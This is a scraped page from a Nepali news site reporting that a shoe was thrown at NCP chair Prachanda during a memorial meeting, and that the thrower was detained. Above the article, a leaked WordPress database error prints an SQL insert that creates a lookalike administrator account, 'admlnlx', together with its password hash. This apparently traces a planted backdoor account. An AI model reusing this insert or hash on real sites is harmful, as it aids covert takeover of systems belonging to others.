WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bo4jaWyAukny.WFNGco5FqHjfZz1SW/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:32:22', '', 'admlnlx', 'admlnlx')

नेकपा अध्यक्ष प्रचण्डमाथि जुत्ता प्रहार – Gaule Khabar

नेकपा अध्यक्ष प्रचण्डमाथि जुत्ता प्रहार

नेकपा अध्यक्ष प्रचण्डमाथि जुत्ता प्रहार

गाउँले न्युज, काठमाडौं । नेपाल कम्युनिस्ट पार्टी का नेकपा अध्यक्ष पुष्पकमल दाहाल प्रचण्डमाथि जुत्ता प्रहार भएको छ ।
राष्ट्रियसभा गृहमा नेकपा नेता भरतमोहन अधिकारीको प्रथम स्मृति सभालाई संबोधन गरेर सिटमा फर्किने क्रममा दर्शकदीर्घाबाट उनलाई ताकेर जुत्ता प्रहार भएको हो । तर जुत्ता मञ्चसम्म आइपुगेन ।
जुत्ता प्रहार गर्ने व्यक्तिलाई सुरक्षाकर्मीले नियन्‍त्रणमा लिएको छ । जुत्ता हान्रे जुम्लाका रतन तिरुवा रहेको प्रहरीले जनाएको छ । २०/२१ वर्षका उनी लोक सेवा आयोगको परीक्षा तयारीमा रहेको खुलेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका